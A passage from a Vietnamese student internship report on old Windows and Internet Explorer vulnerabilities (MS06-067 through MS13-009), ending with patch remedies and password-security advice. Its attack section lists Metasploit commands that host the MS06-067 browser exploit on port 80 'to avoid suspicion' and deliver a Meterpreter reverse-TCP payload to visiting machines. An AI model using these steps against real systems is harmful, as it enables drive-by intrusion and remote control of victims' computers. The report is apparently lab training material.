- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại

http://metasploit.org) đóng vai trò là một Honeypot trên mạng.

(hình 3.2: Công cụ metasploit)

SVTH: Nguyễn Văn Hưng Trang 19

Page 28: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

4.4 Tấn công qua Internet

4.4.1 Các lỗi bảo mật:a) Lỗi bảo mật Ms06-067:

Mô tả:

– Là lỗi làm cho IE bị tràn bộ đệm, để có thể dựa vào đó mà tấn công và thực hiện mã

lệnh từ xa.

Hệ điều hành bị ảnh hưởng:

– Windows XP Universal

– Windows 2000 Universal

– Windows Server 2003 Universal

b) Lỗi bảo mật Ms10-046:

Mô tả:

– Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho

phép thực thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị.

Một kẻ tấn công khai thác thành công lỗ hổng này có thể đạt

được các quyền người dùng tương tự như người dùng địa phương. Người dùng có

tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh

hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.

Phần mềm bị ảnh hưởng:

– Windows XP Service Pack 3

– Windows XP Professional x64 Edition Service Pack 2

– Windows Server 2003 Service Pack 2

– Windows Server 2003 x64 Edition Service Pack 2

– Windows Server 2003 with SP2 for Itanium-based Systems

– Windows Vista Service Pack 1 and Windows Vista Service Pack

– Windows Vista x64 Edition Service Pack 1 and Windows Vista x64

Edition Service Pack 2

SVTH: Nguyễn Văn Hưng Trang 20

Page 29: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

– Windows Server 2008 for 32-bit Systems and Windows Server 2008 for

32-bit Systems Service Pack 2

– Windows Server 2008 for x64-based Systems and Windows Server

2008 for x64-based Systems Service Pack 2

– Windows Server 2008 for Itanium-based Systems and Windows Server

2008 for Itanium-based Systems Service Pack 2

– Windows 7 for 32-bit Systems

– Windows 7 for x64-based Systems

– Windows Server 2008 R2 for x64-based Systems

– Windows Server 2008 R2 for Itanium-based System

c) Lỗi bảo mật Ms11-003:

Mô tả:

– Là lỗi dựa trên CSS của IE, khai thác vào lỗ hỏng của HTML. Khi nó phân tích một

trang HTML có chứa hàm đệ quy, hàm này sẽ bị xóa nhưng sau đó được sử dụng lại.

Phần mềm bị ảnh hưởng:

– Internet Explorer 6

– Internet Explorer 7

– Internet Explorer 8

d) Lỗi bảo mật Ms12-063:

Mô tả:

– Khi tải một trang web bình thường sẽ có một Object với một hàm get gọi là Object

IMSHTCP. Nhưng nếu có sự can thiệp, khi load trang thì bất ngờ Object này bị xóa đi

và sau đó được sử dụng lại, từ đó Hacker có thể thâm nhập vào

Phần mềm bị ảnh hưởng:

– Internet Explorer 7 trên Windown XP SP3

– Internet Explorer 8 trên Windown XP SP3

– Internet Explorer 7 trên Windown Vista

SVTH: Nguyễn Văn Hưng Trang 21

Page 30: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

– Internet Explorer 8 trên Windown XP SP3

– Internet Explorer 8 trên Windown 7

– Internet Explorer 9 trên Windown 7

e) Lỗi bảo mật Ms13-009:

Phần mềm bị ảnh hưởng:

– Internet Explorer 8 trên Windown XP SP3

4.5 Phương pháp tấn công

(hình3.3: Ping đến trang google.com)

Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack, trình

duyệt Internet Explorer 6.0

SVTH: Nguyễn Văn Hưng Trang 22

Page 31: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

- Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe

các sự truy cập từ bên ngoài

use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067)

show options (Xem thông tin thiết đặt)

set srvhost (địa chi máy vps)

set lhost (địa chì máy vps)

set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định, metasploit sẽ

chọn ngẫu nhiên đường dẫn bất kỳ)

set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ của

người dùng)

set payload windows/meterpreter/reverse_tcp

exploit

- Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ mà mestaploit trên

vps đã tạo ra . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi trojan về máy

mục tiêu.

(hình 3.4 gửi Trojan về máy mục tiêu)

SVTH: Nguyễn Văn Hưng Trang 23

Page 32: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

- Khi máy truy cập vào đia chỉ thì metasploit sẽ gửi trojan về máy mục tiêu tiến trình

xâm nhập thành cộng

- Bây giờ ta có thể tiến hành khai thác tại máy mục tiêu:

(Hình 3.5: Khai thác thông tin từ máy mục tiêu)

4.6. Phương pháp khắc phục lỗ hổng

Ms06-067: Cập nhập hệ điều hành lên phiên bản Service Pack 2

Ms10-046: tải gói KB286198 để vài đặt vào trong hệ thống hoặc cập nhật hệ điều hành

lên phiên bản hệ điều hành mới hơn

Ms11-003: Cập nhập hệ điều hành lên phiên bản mới nhất

Ms12-063: tải gói vá lỗi KB2744842 để cài đặt vào trong hệ thống

Ms13-009: tải gói vá lỗi KB2792100 để cài đặt vào trong hệ thống

SVTH: Nguyễn Văn Hưng Trang 24

Page 33: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

PHẦN 5: TỔNG KẾT

Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau:

Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra.

Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ở khóa:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup dữ liệu bằng rdisk.

Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý:

Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy.

Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.

Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến).

Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.

SVTH: Nguyễn Văn Hưng Trang 25

Page 34: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

DANH MỤC TÀI LIỆU THAM KHẢO

Nguyễn Sơn Khê, Đỗ Tấn Phát, Nguyễn Cao Thắng, Athena – Sử dụngBackTrack 5 khai thác lỗ hổng mạng.

SVTH: Nguyễn Văn Hưng Trang 26